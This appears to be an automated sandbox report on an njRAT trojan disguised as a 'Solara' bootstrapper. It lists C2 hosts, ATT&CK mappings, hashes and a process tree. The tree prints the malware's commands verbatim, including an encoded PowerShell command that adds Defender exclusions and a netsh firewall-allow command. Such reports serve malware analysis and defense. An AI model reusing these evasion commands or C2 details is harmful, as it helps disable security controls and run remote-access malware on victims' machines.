Analysis
-
max time kernel
53s -
max time network
57s -
platform
windows11-21h2_x64 -
resource
win11-20241007-fr -
resource tags
arch:x64arch:x86image:win11-20241007-frlocale:fr-fros:windows11-21h2-x64systemwindows -
submitted
16-01-2025 14:58
Static task
static1
Behavioral task
behavioral1
Sample
Bootstrapper.exe
Resource
win11-20241007-fr
General
-
Target
Bootstrapper.exe
-
Size
19.0MB
-
MD5
4581b2e238f1dad629dc72c168b2be8e
-
SHA1
74dce1860065aad35cb68115545bdf862bddb775
-
SHA256
233f9f88c16fb185eb91f4afc116b808eb8fa5fd0cf1b3d3a92ec6732c56314b
-
SHA512
dcea04ffffdf35107a0cd6998eaef3f91270985c80028c206f59ae7d9b193defb3089826a7d1118391f849618904fdf7e77621348531b711d2eac89f422d132a
-
SSDEEP
24576:tigOpgzfDfMSCWk6/SCOqZkHIyGigOpgzfDfMSCWk6/SCOqZkHIy:dB5CW9/SCzhycB5CW9/SCzhy
Malware Config
Extracted
njrat
0.7d
HacKed
hakim32.ddns.net:2000
86.1.93.186:25565
7b8566fe52762c19d1b844b254fc8d30
-
reg_key
7b8566fe52762c19d1b844b254fc8d30
-
splitter
|'|'|
Signatures
-
Njrat family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Solara.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3776 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Solara.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Solara.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7b8566fe52762c19d1b844b254fc8d30Windows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7b8566fe52762c19d1b844b254fc8d30Windows Update.exe server.exe -
Executes dropped EXE 5 IoCs
pid Process 8 BootstrapperV1.22.exe 5028 svchost.exe 2300 server.exe 1972 BootstrapperV2.15.exe 3260 Solara.exe -
Loads dropped DLL 2 IoCs
pid Process 3260 Solara.exe 3260 Solara.exe -
resource yara_rule behavioral1/files/0x001900000002ad25-207.dat themida behavioral1/memory/3260-212-0x0000000180000000-0x00000001810FC000-memory.dmp themida behavioral1/memory/3260-211-0x0000000180000000-0x00000001810FC000-memory.dmp themida behavioral1/memory/3260-210-0x0000000180000000-0x00000001810FC000-memory.dmp themida behavioral1/memory/3260-209-0x0000000180000000-0x00000001810FC000-memory.dmp themida behavioral1/memory/3260-213-0x0000000180000000-0x00000001810FC000-memory.dmp themida behavioral1/memory/3260-314-0x0000000180000000-0x00000001810FC000-memory.dmp themida behavioral1/memory/3260-408-0x0000000180000000-0x00000001810FC000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Solara.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 1 pastebin.com 8 pastebin.com 31 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\autorun.inf server.exe File opened for modification C:\autorun.inf server.exe File created F:\autorun.inf server.exe File opened for modification F:\autorun.inf server.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\Explower.exe server.exe File opened for modification C:\Windows\SysWOW64\Explower.exe server.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3260 Solara.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2956 msedgewebview2.exe 1976 msedgewebview2.exe 1456 msedgewebview2.exe 4996 msedgewebview2.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedgewebview2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedgewebview2.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 3656 ipconfig.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 236 powershell.exe 236 powershell.exe 1972 BootstrapperV2.15.exe 3260 Solara.exe 3260 Solara.exe 1880 msedgewebview2.exe 1880 msedgewebview2.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 3260 Solara.exe 2956 msedgewebview2.exe 2956 msedgewebview2.exe 3260 Solara.exe 3260 Solara.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2300 server.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
pid Process 4588 msedgewebview2.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 236 powershell.exe Token: SeDebugPrivilege 8 BootstrapperV1.22.exe Token: SeDebugPrivilege 2300 server.exe Token: 33 2300 server.exe Token: SeIncBasePriorityPrivilege 2300 server.exe Token: SeDebugPrivilege 1972 BootstrapperV2.15.exe Token: 33 2300 server.exe Token: SeIncBasePriorityPrivilege 2300 server.exe Token: SeDebugPrivilege 3260 Solara.exe Token: 33 2300 server.exe Token: SeIncBasePriorityPrivilege 2300 server.exe Token: 33 2300 server.exe Token: SeIncBasePriorityPrivilege 2300 server.exe Token: 33 2300 server.exe Token: SeIncBasePriorityPrivilege 2300 server.exe Token: 33 2300 server.exe Token: SeIncBasePriorityPrivilege 2300 server.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4588 msedgewebview2.exe 4588 msedgewebview2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2216 wrote to memory of 236 2216 Bootstrapper.exe 78 PID 2216 wrote to memory of 236 2216 Bootstrapper.exe 78 PID 2216 wrote to memory of 236 2216 Bootstrapper.exe 78 PID 2216 wrote to memory of 8 2216 Bootstrapper.exe 80 PID 2216 wrote to memory of 8 2216 Bootstrapper.exe 80 PID 2216 wrote to memory of 5028 2216 Bootstrapper.exe 82 PID 2216 wrote to memory of 5028 2216 Bootstrapper.exe 82 PID 2216 wrote to memory of 5028 2216 Bootstrapper.exe 82 PID 8 wrote to memory of 960 8 BootstrapperV1.22.exe 83 PID 8 wrote to memory of 960 8 BootstrapperV1.22.exe 83 PID 960 wrote to memory of 3656 960 cmd.exe 85 PID 960 wrote to memory of 3656 960 cmd.exe 85 PID 5028 wrote to memory of 2300 5028 svchost.exe 86 PID 5028 wrote to memory of 2300 5028 svchost.exe 86 PID 5028 wrote to memory of 2300 5028 svchost.exe 86 PID 2300 wrote to memory of 3776 2300 server.exe 87 PID 2300 wrote to memory of 3776 2300 server.exe 87 PID 2300 wrote to memory of 3776 2300 server.exe 87 PID 8 wrote to memory of 1972 8 BootstrapperV1.22.exe 89 PID 8 wrote to memory of 1972 8 BootstrapperV1.22.exe 89 PID 1972 wrote to memory of 3260 1972 BootstrapperV2.15.exe 90 PID 1972 wrote to memory of 3260 1972 BootstrapperV2.15.exe 90 PID 3260 wrote to memory of 4588 3260 Solara.exe 91 PID 3260 wrote to memory of 4588 3260 Solara.exe 91 PID 4588 wrote to memory of 4684 4588 msedgewebview2.exe 92 PID 4588 wrote to memory of 4684 4588 msedgewebview2.exe 92 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93 PID 4588 wrote to memory of 1976 4588 msedgewebview2.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAbABkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAeQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAYQB4ACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:236
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.22.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.22.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c ipconfig /all3⤵
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:3656
-
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV2.15.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV2.15.exe" --oldBootstrapper "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.22.exe" --isUpdate true3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\ProgramData\Solara\Solara.exe"C:\ProgramData\Solara\Solara.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=3260.1784.98123883665009922225⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\Crashpad --metrics-dir=C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe8,0x114,0x7ffb88103cb8,0x7ffb88103cc8,0x7ffb88103cd86⤵PID:4684
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1892,11608134855864224664,10025627670974231987,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:26⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1976
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,11608134855864224664,10025627670974231987,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=fr --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2220 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:1880
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,11608134855864224664,10025627670974231987,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=fr --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2452 /prefetch:86⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1456
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1892,11608134855864224664,10025627670974231987,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=fr --noerrdialogs --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:16⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4996
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,11608134855864224664,10025627670974231987,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=fr --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4548 /prefetch:86⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2956
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Drops autorun.inf file
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3776
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3412
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4680
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Obfuscated Files or Information
1Command Obfuscation
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
557KB
MD5b037ca44fd19b8eedb6d5b9de3e48469
SHA11f328389c62cf673b3de97e1869c139d2543494e
SHA25611e88b2ca921e5c88f64567f11bd83cbc396c10365d40972f3359fcc7965d197
SHA512fa89ab3347fd57486cf3064ad164574f70e2c2b77c382785479bfd5ab50caa0881de3c2763a0932feac2faaf09479ef699a04ba202866dc7e92640246ba9598b
-
Filesize
50KB
MD5e107c88a6fc54cc3ceb4d85768374074
SHA1a8d89ae75880f4fca7d7167fae23ac0d95e3d5f6
SHA2568f821f0c818f8d817b82f76c25f90fde9fb73ff1ae99c3df3eaf2b955653c9c8
SHA512b39e07b0c614a0fa88afb1f3b0d9bb9ba9c932e2b30899002008220ccf1acb0f018d5414aee64d92222c2c39f3ffe2c0ad2d9962d23aaa4bf5750c12c7f3e6fe
-
Filesize
14KB
MD5597baae0b942899b6b78c6b08eed7a79
SHA1a759a688fe486c9b9b16be127aa3d1c0b421bea5
SHA25671a6ac2b2b812cf6a795a1584f8a15523f2063f6fcb236a892f8181aa62ce85e
SHA512949522ec12408930864909553994817d654b6b66504adfa8a85a3c12a38966e471dbcc932078ace615f3bedd73732b635fe7bb3714eb2c147f7cf816b09834f3
-
Filesize
14KB
MD5610eb8cecd447fcf97c242720d32b6bd
SHA14b094388e0e5135e29c49ce42ff2aa099b7f2d43
SHA256107d8d9d6c94d2a86ac5af4b4cec43d959c2e44d445017fea59e2e0a5efafdc7
SHA512cf15f49ef3ae578a5f725e24bdde86c33bbc4fd30a6eb885729fd3d9b151a4b13822fa8c35d3e0345ec43d567a246111764812596fd0ecc36582b8ee2a76c331
-
Filesize
5KB
MD58706d861294e09a1f2f7e63d19e5fcb7
SHA1fa5f4bdc6c2f1728f65c41fb5c539211a24b6f23
SHA256fc2d6fb52a524a56cd8ac53bfe4bad733f246e76dc73cbec4c61be32d282ac42
SHA5121f9297eb4392db612630f824069afdc9d49259aba6361fb0b87372123ada067bc27d10d0623dc1eb7494da55c82840c5521f6fef74c1ada3b0fd801755234f1f
-
Filesize
171KB
MD56af9c0d237b31c1c91f7faa84b384bdf
SHA1c349b06cad41c2997f5018a9b88baedd0ba1ea11
SHA256fb2cbf2ee64286bc010a6c6fe6a81c6c292c145a2f584d0240c674f56e3015b0
SHA5123bda519fed1cfa5352f463d3f91194122cf6bf7c3c7ab6927c8ca3eea159d35deb39328576e7cbd982cfdf1f101b2a46c3165221501b36919dbde6f1e94bf5ff
-
Filesize
2.0MB
MD59399a8eaa741d04b0ae6566a5ebb8106
SHA15646a9d35b773d784ad914417ed861c5cba45e31
SHA25693d28520c07fbca09e20886087f28797bb7bd0e6cf77400153aab5ae67e3ce18
SHA512d37ef5a848e371f7db9616a4bf8b5347449abb3e244a5527396756791583cad455802450ceeb88dce39642c47aceaf2be6b95bede23b9ed68b5d4b7b9022b9c8
-
Filesize
31KB
MD574dd2381ddbb5af80ce28aefed3068fc
SHA10996dc91842ab20387e08a46f3807a3f77958902
SHA256fdd9d64ce5284373d1541528d15e2aa8aa3a4adc11b51b3d71d3a3953f8bcc48
SHA5128841e0823905cf3168f388a7aeaf5edd32d44902035ba2078202193354caf8cd74cb4cab920e455404575739f35e19ea5f3d88eab012c4ebefc0ccb1ed19a46e
-
Filesize
27KB
MD58a3086f6c6298f986bda09080dd003b1
SHA18c7d41c586bfa015fb5cc50a2fdc547711b57c3c
SHA2560512d9ed3e5bb3daef94aa5c16a6c3e2ee26ffed9de00d1434ffe46a027b16b9
SHA5129e586742f4e19938132e41145deec584a7b8c7e111b3c6e9254f8d11db632ebe4d66898458ed7bcfc0614d06e20eb33d5a6a8eb8b32d91110557255cf1dbf017
-
Filesize
695KB
MD5195ffb7167db3219b217c4fd439eedd6
SHA11e76e6099570ede620b76ed47cf8d03a936d49f8
SHA256e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d
SHA51256eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac
-
Filesize
613KB
MD5efa26a96b7af259f6682bc888a8b6a14
SHA19800a30228504c30e7d8aea873ded6a7d7d133bb
